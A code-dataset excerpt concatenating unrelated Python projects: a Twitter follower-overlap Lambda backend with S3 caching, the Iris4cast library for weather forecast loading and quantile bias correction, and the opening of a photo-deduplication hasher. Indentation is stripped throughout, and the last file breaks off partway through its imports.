from UserAPI import get_user_info
def get_overlap(users1, users2):
user_ids = set()
for user in users1:
user_ids.add(user['id'])
overlap = list()
for user in users2:
user_id = user['id']
if user_id in user_ids:
overlap.append(user)
return overlap
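# e.g. get_overlap([{"id": "1"}, {"id": "2"}], [{"id": "2"}, {"id": "3"}]) -> [{"id": "2"}]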
def get_users_you_follow_that_follow_me(my_id, your_id):
my_followers = get_followers_for_id(my_id)
    sys.getsizeof(json.dumps(my_followers))
your_following = get_following_for_id(your_id)
return get_overlap(my_followers, your_following)
def get_users_you_follow_that_follow_me_using_handles(my_username, your_username):
users = get_user_info([my_username, your_username])
my_user_id = users['data'][0]['id']
your_user_id = users['data'][1]['id']
return get_users_you_follow_that_follow_me(my_user_id, your_user_id)
def get_users_who_follow_you_and_me(my_username, your_username):
users = get_user_info([my_username, your_username])
my_user_id = users['data'][0]['id']
your_user_id = users['data'][1]['id']
my_followers = get_followers_for_id(my_user_id)
your_followers = get_followers_for_id(your_user_id)
return get_overlap(my_followers, your_followers)
if __name__ == "__main__":
# my_username = "AlanaDLevin"
# your_username = "nishitaARK"
# print("Users that {} follows that follow {}".format(your_username, my_username))
# users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username)
# for user in users:
# print("{} ({})".format(user['name'], user['username']))
# print("")
my_username = "nishitaARK"
your_username = "AlanaDLevin"
print("Users that {} follows that follow {}".format(your_username, my_username))
users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username)
for user in users:
print("{} ({})".format(user['name'], user['username']))
```
#### File: twitter-legitimacy/backend/handler.py
```python
import boto3
import json
import time
import os
from botocore.exceptions import ClientError
from functions.UserAPI import get_user_info
from functions.FollowersAPI import get_followers_for_id, get_following_for_id
# Import DynamoDB
s3 = boto3.client('s3')
# Import Environment Variables
followersBucket = os.environ['FOLLOWERS_BUCKET']
followingBucket = os.environ['FOLLOWING_BUCKET']
cacheDuration = os.environ['CACHE_DURATION']
# -------- Helper Functions --------
def get_overlap(users1, users2):
user_ids = set()
for user in users1:
user_ids.add(user['id'])
overlap = list()
for user in users2:
user_id = user['id']
if user_id in user_ids:
overlap.append(user)
return overlap
# -------- DynamoDB Functions --------
def get_cached_followers(userID):
try:
print(followersBucket)
print(userID)
data = s3.get_object(Bucket=followersBucket, Key=userID)
followers = data.get('Body').read().decode('utf-8')
return json.loads(followers)
except ClientError as e:
print("ClientError: %s" % e)
return None
def get_cached_following(userID):
try:
print(followingBucket)
print(userID)
data = s3.get_object(Bucket=followingBucket, Key=userID)
following = data.get('Body').read().decode('utf-8')
return json.loads(following)
except ClientError as e:
print("ClientError: %s" % e)
return None
def cache_followers(userID, followers):
s3.put_object(
Body=json.dumps(followers),
Bucket=followersBucket,
Key=userID
)
def cache_following(userID, following):
s3.put_object(
Body=json.dumps(following),
Bucket=followingBucket,
Key=userID
)
# -------- Main Function (Start) --------
def followsMyFollowers(event, context):
params = json.loads(event['body'])
source_user = params['source_user']
target_user = params['target_user']
return followsMyFollowersHelper(source_user, target_user)
def followsMyFollowersHelper(source_user, target_user):
try:
print("{} looking up {}".format(source_user, target_user))
# 1. Remove '@' from string (user can input "@handle" or "handle")
source_user = source_user.replace("@","")
target_user = target_user.replace("@","")
# 2. Get user info for the source and target users (id, name, profile_url)
user_info = get_user_info([source_user, target_user])['data']
source_user_info = user_info[0]
target_user_info = user_info[1]
source_id = source_user_info['id']
target_id = target_user_info['id']
# 3. Get followers of source user (look up in cache first)
source_followers = get_cached_followers(source_id)
if source_followers is None:
source_followers = get_followers_for_id(source_id)
cache_followers(source_id, source_followers)
# 4. Get users that target follows (look up in cache first)
target_following = get_cached_following(target_id)
if target_following is None:
target_following = get_following_for_id(target_id)
cache_following(target_id, target_following)
# 5. Get users that target follows that follow source
users = get_overlap(source_followers, target_following)
# 6. Return response
body = {
"source": source_user_info,
"target": target_user_info,
"followers_followed": users,
}
response = {
"statusCode": 200,
"headers": {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": json.dumps(body, indent=4)
}
return response
except Exception as e:
        if 'Request returned an error: 429' in str(e):
response = {
"statusCode": 429,
"headers": {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": "Too Many Requests"
}
return response
else:
response = {
"statusCode": 400,
"headers": {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": "Something went wrong"
}
return response
# -------- Test Function --------
def followsMyFollowersTest(event, context):
source_user = "AlanaDLevin"
target_user = "nishitaARK"
return followsMyFollowersHelper(source_user, target_user)
``` |
{
"source": "joshdorrington/Iris4cast",
"score": 3
} |
#### File: joshdorrington/Iris4cast/Iris4cast.py
```python
import iris
import copy as cp
import datetime as dt
import iris.coord_categorisation as iccat
from iris.analysis.cartography import cosine_latitude_weights
import numpy as np
import cf_units
import os
class Dataset:
def __init__(self,field,dates,leads=None):
"""
Dataset is the base class shared by all analysis and forecast data sets. It defines
all functions that are generic between datasets. Not normally used directly.
Args:
* field - A string used to identify which fields to load from file.
            *dates - a list or tuple of 2 datetime.datetime objects specifying the
first and last datetime to include in the data
*leads - used by the Forecast class only, a list or tuple of 2 floats,
specifying minimum and maximum lead times in days to include.
"""
self.field=field
self.dates=dates
self._d_l,self._d_u=dates
self.leads=leads
#Only data of the same forecast hour is currently supported.
assert dates[0].hour==dates[1].hour
self.hour=[dates[0].hour]
#Name of the primary time coordinate
self.T="time"
#The expected position of the primary time coordinate in the cube
self.t=0
#The day of year associated with 'dates'
self.calendar_bounds=[d.timetuple().tm_yday for d in dates]
self.type=Dataset
#A dictionary that can contain any number of iris CubeLists, each
#labelled with a keyword. The load_data method generates a "data" and
#a "clim" CubeList
self.data={}
#Used by the get_climatology method
self.dist_means=None
self.distribution=None
#The time unit to use
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_GREGORIAN)
#Constraints applied to the data at different points.
self.constraints={
#keep only data with a valid time coordinate
"load":iris.Constraint(cube_func=lambda cube: cube.coords(self.T)!=[]),
#keep only data that falls within the calendar_bounds
"calendar":iris.Constraint(coord_values={"day_of_year":lambda cell:\
self._in_calendar_bounds(cell)}),
#keep only data for the right hour
"hour":iris.Constraint(coord_values={"hour":lambda cell:\
np.isin(cell,self.hour)[0]}),
#keep only data that falls within the dates
"data":iris.Constraint(coord_values={self.T:lambda cell:\
self._d_l<=cell<=self._d_u}),
#keep only data that falls outside the dates
"clim":iris.Constraint(coord_values={self.T:lambda cell:\
(self._d_l>cell)or (cell>self._d_u)})
}
self._setup()
def _setup(self):
"""empty method used by derived classes."""
pass
def set_path(self,path):
"""set the path from which to load data"""
if os.path.isdir(path):
self.path=path
else:
raise(ValueError("Not a valid path."))
def copy(self):
"""A method which returns a copy of the Dataset"""
copy=self.type(self.field,self.dates,self.leads)
copy.dist_means=self.dist_means
copy.distribution=self.distribution
copy.data=cp.deepcopy(self.data)
return copy
def add_constraints(self,constr_dict):
"""add a dictionary of constraints 'constr_dict' to the constraints
attribute. Any previously defined keywords will be overwritten."""
for key in constr_dict:
self.constraints[key]=constr_dict[key]
def load_data(self,strict=True):
"""Load data from self.path as a list of iris cubes, preprocess it,
and split it into two CubeLists "data" and "clim".
"""
CL=iris.cube.CubeList()
fs=[self.path+f for f in os.listdir(self.path) if f.endswith(".nc")]
for f in fs:
CL.append(iris.load_cube(f,constraint=self.constraints["load"]))
self.data=CL
self._clean_loaded_data()
a=self.data.extract(self.constraints["data"])
c=self.data.extract(self.constraints["clim"])
if strict:
if a is None: raise(ValueError("No data after applying constraints."))
if c is None: raise(ValueError("No climatology data after applying constraints."))
self.data={"data":a,"clim":c}
def _clean_loaded_data(self):
"""empty method used by derived classes."""
pass
def _in_calendar_bounds(self,x):
"""Evaluates whether a real number x lies between the calendar_bounds
of the dataset, wrapping around the end of the year if necessary."""
c0,c1=self.calendar_bounds
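        # e.g. bounds [350, 20] wrap the new year: days 360 and 5 are inside, day 100 is not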
if c1<c0:
ans=(x<=c1) or (x>=c0)
else:
ans=(x<=c1) and (x>=c0)
return ans
def restrict_area(self,region):
"""A convenience method that restricts the spatial extent of the
Dataset to one of a few preset domains, defined by a string "region".
"""
if region.lower()=="europe":
lons=[-15,20]
lats=[32,60]
elif region.lower()=="france":
lons=[-5,8]
lats=[42,51]
elif region.lower()=="north_atlantic":
lons=[-80,40]
lats=[30,90]
else: raise(ValueError(f"Unrecognised region {region}."))
#We use this over intersection, because it works for cubelists
area_constr=iris.Constraint(longitude=lambda x: lons[0]<=x<=lons[1],\
latitude=lambda x: lats[0]<=x<=lats[1])
for key in self.data:
self.data[key]=self.data[key].extract(area_constr)
def add_cat_coord(self,iccat_function,coordname,base_coord):
"""Adds a categorical coordinate to all cubes in Dataset.data, defined
by 'iccat_function' relative to 'base_coord', and called 'coordname'.
Note that the name of the new coord is defined internally by
        iccat_function; coordname serves only to gracefully handle the case when
that coordinate already exists."""
for key in self.data:
for i,entry in enumerate(self.data[key]):
if entry.coords(coordname)==[]:
iccat_function(entry,base_coord)
def change_units(self,unit_str=None,cf_unit=None):
"""Changes the units of all cubes in the Dataset to a new unit given
either by a valid cf_units.Unit string specifier 'unit_str', or a
cf_units.Unit object, 'cf_unit'."""
if unit_str is not None and cf_unit is not None:
raise(ValueError("Only one unit can be provided."))
elif unit_str is not None:
unit=cf_units.Unit(unit_str)
elif cf_unit is not None:
unit=cf_unit
else: raise(ValueError("A unit must be provided."))
for key in self.data:
for i,entry in enumerate(self.data[key]):
entry.convert_units(unit)
def change_dates(self,newdates):
"""
Redefines the 'dates' attribute to the list of 2 datetimes 'newdates',
reapplying the "data" and "clim" constraints to match
**currently quite slow for large cubelists**
"""
self.dates=newdates
self._d_l,self._d_u=self.dates
self.calendar_bounds=[d.timetuple().tm_yday for d in self.dates]
CL_data=iris.cube.CubeList()
CL_clim=iris.cube.CubeList()
for key in self.data:
a=self.data[key].extract(self.constraints["data"])
if a != []:
CL_data.append(a)
a=self.data[key].extract(self.constraints["clim"])
if a != []:
CL_clim.append(a)
CL_data=iris.cube.CubeList([c for C in CL_data for c in C])
CL_clim=iris.cube.CubeList([c for C in CL_clim for c in C])
self.data["data"]=CL_data.concatenate()
self.data["clim"]=CL_clim.concatenate()
def change_calendar(self,newcalendar):
for key in self.data:
for i,entry in enumerate(self.data[key]):
newunit=cf_units.Unit(\
entry.coord("time").units.origin,calendar=newcalendar)
self.data[key][i].coord("time").unit=newunit
def aggregate_by(self,coords,bins,aggregator=iris.analysis.MEAN):
"""Aggregates the coordinates of all cubes in Dataset into user defined
bins.
Args:
*coords - A list of strings which are the coordinates
to be aggregated over.
*bins - A corresponding list of lists 'bins'. bins[i]
should contain the bounding values over which to group coords[i].
Kwargs:
*aggregator -A valid iris.analysis.Aggregator object which specifies
how to aggregate entries together.
"""
binlabels=[]
for j,coord in enumerate(coords):
binlabels.append(f"bin{j}")
for key in self.data:
for i,entry in enumerate(self.data[key]):
for j,(coord,b) in enumerate(zip(coords,bins)):
#remove potential old bins:
if self.data[key][i].coords(f"bin{j}")!=[]:
self.data[key][i].remove_coord(f"bin{j}")
if self.data[key][i].coords(coord)==[]:
raise(ValueError("No such coordinate in cube!"))
label=np.digitize(entry.coord(coord).points,b)
coord_dim=entry.coord_dims(entry.coord(coord))
entry.add_aux_coord(iris.coords.AuxCoord(label,\
var_name=f"bin{j}"),data_dims=coord_dim)
self.data[key][i]=entry.aggregated_by(binlabels,aggregator)
for j,coord in enumerate(coords):
if self.data[key][i].coords(coord)!=[]:
self.data[key][i].remove_coord(f"bin{j}")
def collapse_over(self,coord,aggregator=iris.analysis.MEAN):
"""Collapses all cubes in Dataset over a single coordinate.
Args:
*coords - A string which is the coordinate to collapse.
Kwargs:
*aggregator -A valid iris.analysis.Aggregator object which specifies
how to collapse the coordinate.
"""
for key in self.data:
for i,entry in enumerate(self.data[key]):
self.data[key][i]=self.data[key][i].collapsed(coord,aggregator)
def apply_coslat_mean(self,mask=None):
"""Collapses the latitude and longitude coordinates of all cubes in
Dataset, using a cosine latitude weighting.
Kwargs:
*mask:
A cube with matching latitude and longitude coordinates to
the cubes in Dataset. Each gridpoint in 'mask' should vary between
0 (totally masked) to 1 (totally unmasked).
"""
for key in self.data:
for i,entry in enumerate(self.data[key]):
weights = cosine_latitude_weights(entry)
#include the land sea mask in the weighting if one was passed.
if mask is not None:
weights=weights*mask.data
self.data[key][i]=entry.collapsed(["latitude","longitude"],\
iris.analysis.MEAN,weights=weights)
def regrid_to(self,dataset=None,cube=None,regridder=iris.analysis.Linear()):
"""regrids every cube in Dataset to match either those of another
Dataset object, or an iris.Cube object."""
if cube is None and dataset is None:
raise(ValueError("No reference for regridding provided!"))
elif cube is None:
ref_cube=dataset.data["data"][0]
else:
ref_cube=cube
for key in self.data:
for i,entry in enumerate(self.data[key]):
self.data[key][i]=entry.regrid(ref_cube,regridder)
def apply(self,func,*args,in_place=True,keys=None,**kwargs):
"""A method which applies a function to every cube in Dataset
Args:
*func - A function of the type func(cube,*args,**kwargs).
Kwargs:
            in_place - A boolean specifying whether func modifies the cube in
            place. If True, the return value of func is ignored. If False,
            cube is replaced by func(cube), unless the output is None, in
            which case cube is removed from the CubeList.
"""
if keys is None:
keys=self.data
for key in keys:
for i,entry in enumerate(self.data[key]):
result=func(entry,*args,**kwargs)
if in_place:
pass
else:
if result is not None:
self.data[key][i]=result
else:
self.data[key].remove(self.data[key][i])
def apply_constraint(self,constraint,keys=None):
"""Apply a constraint to all cubes in Dataset"""
if keys is None:
keys=self.data
for key in keys:
self.data[key]=self.data[key].extract(constraint)
def get_climatology(self,percentiles):
"""Finds the distribution of all values in the Dataset.
Args:
* percentiles - A numpy array ([p_1,...,p_N]) where 0<=p_i<=100,
which defines the percentiles of the data distribution to calculate.
"""
self.percentiles=percentiles
lat,lon=self.data["clim"][0].shape[-2:]
dist=np.zeros([1,lat,lon])
#We call the whole cubelist into memory
self.data["clim"].realise_data()
dist=np.concatenate([f.data.reshape([-1,lat,lon]) for f in self.data["clim"]])
self.distribution=np.percentile(dist,percentiles,axis=0)
self.distribution[0]-=0.01
means=np.zeros([len(percentiles)-1,lat,lon])
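        # means[i,j,k] is the mean of the climatological values at gridpoint (j,k)
        # that fall within the i-th percentile bin of the distribution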
for i in range(len(percentiles)-1):
for j in range(lat):
for k in range(lon):
means[i,j,k]=dist[np.digitize(dist[:,j,k],\
self.distribution[:,j,k],right=True)==i+1,j,k].mean()
#interpolates empty bins as being halfway between the distribution bounds
for i,j,k in np.argwhere(np.isnan(means)):
means[i,j,k]=self.distribution[i:i+2,j,k].mean()
self.dist_means=means
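#Illustrative sketch of the binning above (not part of the pipeline): with
#percentiles=[0,50,100] and values dist=[1,2,3,4], np.percentile gives
#distribution=[1,2.5,4]; after the -0.01 shift on the lowest edge,
#np.digitize(dist,distribution,right=True) returns [1,1,2,2], so bin 1 has
#mean 1.5 and bin 2 has mean 3.5; those become the dist_means for that gridpoint.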
def get_seasonal_cycle(self,N=4,period=365.25,keys=None):
"""Fits N sine modes to the data series, with frequencies of n/(365.25 days)
for n in [1,...,N], in order to calculate a smooth seasonal cycle.
Kwargs:
*keys - A list of keys to self.data, specifying which data to use
to calculate the cycle. If keys is None, all data in the dataset
will be used.
"""
#Default is to include all data
if keys is None: keys = [key for key in self.data]
self.deseasonaliser=_Deseasonaliser(self.data,keys,N,period)
self.deseasonaliser.fit_cycle()
def remove_seasonal_cycle(self,deseasonaliser=None,strict_t_ax=False):
if deseasonaliser is None:
if self.deseasonaliser is None:
raise(ValueError("No _Deseasonaliser object found."))
else:
deseasonaliser=self.deseasonaliser
if deseasonaliser.coeffs is None:
deseasonaliser.fit_cycle()
for key in self.data:
for i,cube in enumerate(self.data[key]):
cycle=deseasonaliser.evaluate_cycle(cube.coord("time"),strict=strict_t_ax)
if cycle.shape!=cube.shape:
dim_map=[cube.coord_dims(coord)[0] for coord in \
["time","latitude","longitude"]]
cycle=iris.util.broadcast_to_shape(cycle,cube.shape,dim_map)
self.data[key][i].data=cube.data-cycle
def set_time_axis_first(self,tname="time"):
for key in self.data:
for entry in self.data[key]:
t_ax=entry.coord_dims(tname)[0]
if t_ax!=0:
ax=np.arange(entry.ndim)
entry.transpose([t_ax,*ax[ax!=t_ax]])
class _Deseasonaliser:
def __init__(self,data,keys,N,period=365.25,coeffs=None):
self.raw_data=[]
self.t=[]
self.t_unit=None
self.tref=None
self.keys=keys
self.N=N
self.pnum=2*(N+1)
self.period=period
self.coeffs=None
for key in keys:
for cube in data[key]:
self.raw_data.append(cube.data)
if self.t_unit is not None:
if self.t_unit!=cube.coord("time").units:
raise(ValueError("Clashing time units in data."))
else:
self.t_unit=cube.coord("time").units
self.t.append(cube.coord("time").points)
i=cube.coord_dims("time")[0]
self.raw_data=np.concatenate(self.raw_data,axis=i)
self.t=np.concatenate(self.t,axis=i)
self._setup_data()
self.lat,self.lon=self.raw_data.shape[1:]
def _setup_data(self):
self.raw_data=self.raw_data[np.argsort(self.t)]
self.t.sort()
self.tref=self.t[0]
self.t=(self.t-self.tref)%self.period
#intelligently guesses initial parameters
def _guess_p(self,tstd):
p=np.zeros(self.pnum)
for i in range(0,self.N):
p[2+2*i]=tstd/(i+1.0)
return p
def _change_calendar(self,new_calendar):
self.t_unit=cf_units.Unit(self.t_unit.origin,calendar=new_calendar)
#defines multimode sine function for fitting
def _evaluate_fit(self,x,p,N):
ans=p[0]*x+p[1]
for i in range(0,N):
ans+=p[2*i+2] * np.sin(2 * np.pi * (i+1)/self.period * x + p[2*i+3])
return ans
#defines error function for optimisation
def _get_residual(self,p,y,x,N):
return y - self._evaluate_fit(x,p,N)
def fit_cycle(self):
from scipy.optimize import leastsq
fit_coeffs=np.zeros([self.pnum,self.lat,self.lon])
for i in range(self.lat):
for j in range(self.lon):
griddata=self.raw_data[:,i,j]
tstd=griddata.std()
p0=self._guess_p(tstd)
plsq=leastsq(self._get_residual,p0,args=(griddata,self.t,self.N))
fit_coeffs[:,i,j]=plsq[0]
self.coeffs=fit_coeffs
def evaluate_cycle(self,t,strict=False):
t=t.copy()
if self.coeffs is None:
raise(ValueError("No coefficients for fitting have been calculated yet."))
if t.units!=self.t_unit:
if t.units.is_convertible(self.t_unit):
t.convert_units(self.t_unit)
elif (t.units.origin==self.t_unit.origin) and (not strict):
t.units=cf_units.Unit(t.units.origin,calendar=self.t_unit.calendar)
else:
raise(ValueError("Units of time series to evaluate are \
incompatible with units of fitted time series."))
t=t.points
t=(t-self.tref)%self.period
cycle=np.zeros([len(t),self.lat,self.lon])
for i in range(self.lat):
for j in range(self.lon):
cycle[:,i,j]=self._evaluate_fit(t,self.coeffs[:,i,j],self.N)
return cycle
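#Illustrative note (sketch of the assumed model, matching _evaluate_fit above):
#y(t) ~ p[0]*t + p[1] + sum over n=1..N of p[2n]*sin(2*pi*n*t/period + p[2n+1]),
#i.e. a linear trend plus N harmonics of the seasonal cycle. fit_cycle runs
#scipy.optimize.leastsq on this residual independently at every grid point.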
"""Analysis is a subclass of Dataset that deals with reanalysis. At the moment
specific to era5, but that should be changed if more analyses start being used."""
class Analysis(Dataset):
def _setup(self):
self.path="/mnt/seasonal/reanalysis/era5/"+self.field+"/"
self.type=Analysis
def _clean_loaded_data(self):
for i in range(len(self.data)):
self.data[i].metadata.attributes.clear()
self.data[i].coord("latitude").points=\
self.data[i].coord("latitude").points.astype(np.float32)
self.data[i].coord("longitude").points=\
self.data[i].coord("longitude").points.astype(np.float32)
self.data=self.data.concatenate_cube()
try:
self.data.coord(self.T).convert_units(self.U)
except Exception:
print(f"Warning: could not convert {self.T} to {self.U}, simply renaming calendar.")
new_T=cf_units.Unit(self.data.coord(self.T).units.origin,self.U.calendar)
self.data.coord(self.T).units=new_T
try:
self.data.coord(self.T).convert_units(self.U)
except Exception:
raise(ValueError("Unsuccessful attempt to change time units."))
iccat.add_hour(self.data,self.T)
self.data=self.data.extract(self.constraints["hour"])
iccat.add_day_of_year(self.data,self.T)
self.data=self.data.extract(self.constraints["calendar"])
self.data=iris.cube.CubeList([self.data])
class Forecast(Dataset):
def _setup(self):
self.T="forecast_reference_time"
self.S="forecast_period"
self.R="realisation"
self._l_l,self._l_u=self.leads
self.type=Forecast
self.t=1
self._fsetup()
self.constraints["lead"]=iris.Constraint(coord_values={self.S:\
lambda cell:(self._l_l<=cell)and (cell<=self._l_u)})
self.constraints["ens"]=iris.Constraint(coord_values={self.R:\
lambda cell: cell.point<self.max_ens})
#Used by derived classes
def _fsetup(self):
pass
def get_quantile_correction(self,analysis):
if self.dist_means is None:
raise(ValueError("Must get forecast climatology first."))
if analysis.dist_means is None:
raise(ValueError("Must get analysis climatology first."))
if not np.all(analysis.percentiles == self.percentiles):
raise(ValueError("These datasets have incomparable climatologies."))
self.quantile_correction=analysis.dist_means-self.dist_means
def apply_quantile_correction(self):
lat,lon=self.data["data"][0].shape[-2:]
for i,entry in enumerate(self.data["data"]):
shape=entry.data.shape
data=entry.data.reshape([-1,lat,lon])
for x in range(lat):
for y in range(lon):
which_bin=np.digitize(data[:,x,y],self.distribution[:,x,y],right=True)
which_bin[which_bin==0]+=1 #cold outliers put in 0-5% bin
which_bin[which_bin==len(self.percentiles)]-=1 #warm outliers in 95-100% bin
which_bin-=1 #indexing from zero
correction=self.quantile_correction[:,x,y][which_bin]
data[:,x,y]+=correction
data=data.reshape(shape)
self.data["data"][i].data=data
self.data["data"][i].long_name="corrected "+self.data["data"][i].name()
class SubxForecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/subx/"+self.field+"/"
self.R="realization"
self.max_ens=11
self.type=SubxForecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
def remove_masked(self):
for key in self.data:
self.data[key].realise_data()
masked=[]
for entry in self.data[key]:
if not np.all(entry.data.mask==False):
masked.append(entry)
for entry in masked:
self.data[key].remove(entry)
class EC45Forecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/ec45/netcdf/"+self.field+"/"
self.max_ens=11
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN)
self.type=EC45Forecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
entry.coord(self.S).convert_units(cf_units.Unit("Days"))
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
class Seas5Forecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/seas5/"+self.field+"/"
self.max_ens=25
self.R="realization"
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN)
self.type=Seas5Forecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
entry.coord(self.S).convert_units(cf_units.Unit("Days"))
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
"""An example script:
Here we want to look at week 3 forecasts around the second week of June 2003.
We use a 21 day window, including the first and third weeks. We want
weekly mean temperatures averaged over France, for the EC45, SUBX and SEAS5
forecast systems. We also want to debias our forecasts, using a climatology
of past dates.
"""
#All bounds are inclusive.
#3 week period centred around 11/6/2003
dates=[dt.datetime(2003,6,1,12),dt.datetime(2003,6,21,12)]
leads=[14.5,20.5] #Week 3, in days. We want midday, so we add .5
run=False
if run:
#Load and restrict to the region around France
import time
t0=time.time()
A=Analysis("T2m",dates)
A.load_data()
A.restrict_area("France")
Fx=SubxForecast("T2m",dates,leads)
Fx.load_data()
Fx.restrict_area("France")
Fec=EC45Forecast("2T",dates,leads)
Fec.load_data()
Fec.restrict_area("France")
Fs=Seas5Forecast("T2m",dates,leads)
Fs.load_data()
Fs.restrict_area("France")
t1=time.time()
print(f"loaded data (t={t1-t0:.1f}).")
#Fx has the lowest spatial resolution
A.regrid_to(Fx)
Fec.regrid_to(Fx)
Fs.regrid_to(Fx)
t2=time.time()
print(f"regridded data (t={t2-t1:.1f}).")
#Backups of the uncorrected forecasts so we don't have to reload.
Fx_bkp=Fx.copy()
Fs_bkp=Fs.copy()
Fec_bkp=Fec.copy()
#Compute 5% bins for climatology calculations
#We want our climatology to be computed for daily, gridpoint values:
percentiles=np.linspace(0,100,21)
A.get_climatology(percentiles)
Fx.get_climatology(percentiles)
Fs.get_climatology(percentiles)
Fec.get_climatology(percentiles)
Fx.get_quantile_correction(A)
Fs.get_quantile_correction(A)
Fec.get_quantile_correction(A)
t3=time.time()
print(f"computed corrections (t={t3-t2:.1f}).")
Fx.apply_quantile_correction()
Fs.apply_quantile_correction()
Fec.apply_quantile_correction()
t4=time.time()
print(f"applied corrections (t={t4-t3:.1f}).")
#After error correcting we want to take weekly means. We exclude any
#forecasts that aren't 7 days long:
full_week=iris.Constraint(cube_func=lambda cube: cube.coord("forecast_period").shape[0]==7)
Fx.apply_constraint(full_week)
Fs.apply_constraint(full_week)
Fec.apply_constraint(full_week)
#We then collapse the time axis to get weekly means:
A.apply(lambda cube: cube.collapsed(A.T,iris.analysis.MEAN))
Fx.apply(lambda cube: cube.collapsed(Fx.S,iris.analysis.MEAN))
Fs.apply(lambda cube: cube.collapsed(Fs.S,iris.analysis.MEAN))
Fec.apply(lambda cube: cube.collapsed(Fec.S,iris.analysis.MEAN))
#We load the land/sea mask and apply the area reduction:
MASK_PATH="/mnt/seasonal/land_sea_mask/NAVO_lsmask_1deg.nc"
sea_mask=iris.load_cube(MASK_PATH)
sea_mask=sea_mask.regrid(Fx.data["data"][0],iris.analysis.Linear())
#apply_coslat_mean works in place and returns None, so copy first
A_reduced=A.copy()
A_reduced.apply_coslat_mean(mask=sea_mask)
Fx.apply_coslat_mean(mask=sea_mask)
Fs.apply_coslat_mean(mask=sea_mask)
Fec.apply_coslat_mean(mask=sea_mask)
t5=time.time()
print(f"collapsed lat and lon (t={t5-t4:.1f}).")
print("finished!")
``` |
{
"source": "josh-dot-com/photo-deduplication",
"score": 3
} |
#### File: photo-deduplication/src/hasher.py
```python
from PIL import Image
from imagededup.methods import PHash, AHash, DHash, WHash
from imagehash import average_hash, phash, dhash, whash, colorhash, crop_resistant_hash
class Hasher:
IMAGEDEDUP_HASHER_LIST = [PHash, AHash, DHash, WHash]
IMAGEDEDUP_HASHERS = { h.__name__.lower(): h() for h in IMAGEDEDUP_HASHER_LIST }
IMAGEHASH_FUNCTION_LIST = [average_hash, phash, dhash, whash, colorhash, crop_resistant_hash]
IMAGEHASH_FUNCTIONS = { f.__name__.lower(): f for f in IMAGEHASH_FUNCTION_LIST }
def __init__(self):
self.hashers = self.__class__.IMAGEDEDUP_HASHERS
self.hash_funcs = self.__class__.IMAGEHASH_FUNCTIONS
def imagededup_encode(self, photos):
encodings = {}
for photo in photos:
hashes = {}
for name, hasher in self.hashers.items():
hashes[name] = hasher.encode_image(image_file=photo.abspath())
encodings[photo.id] = hashes
return encodings
def imagehash_encode(self, photos):
encodings = {}
for photo in photos:
pil_photo = Image.open(photo.abspath())
encodings[photo.id] = {name: str(func(pil_photo)) for name, func in self.hash_funcs.items()}
return encodings
def encode_video(self, videos):
# TODO process video portions of live photos
# https://stackoverflow.com/questions/9896644/getting-ffprobe-information-with-python
pass
def find_duplicates(self, photos):
return { n: self.__find_duplicates_with_hasher(n, h, photos) for n, h in self.hashers.items() }
def __find_duplicates_with_hasher(self, hasher_name, hasher, photos):
encoding_map = { photo.abspath(): photo.hashes[hasher_name] for photo in photos }
duplicates = hasher.find_duplicates(encoding_map=encoding_map, scores=True)
return duplicates
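# Illustrative usage sketch (hypothetical Photo objects exposing .id, .abspath()
# and, for find_duplicates, a .hashes dict already populated from the encodings):
# hasher = Hasher()
# encodings = hasher.imagededup_encode(photos) # {photo.id: {"phash": ..., "ahash": ...}}
# dupes = hasher.find_duplicates(photos) # {"phash": {path: [(other_path, score), ...]}, ...}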
```
#### File: photo-deduplication/src/main.py
```python
import os
import logging
from argparse import ArgumentParser
from sqlalchemy import or_
import osxphotos
from hasher import Hasher
from db import \
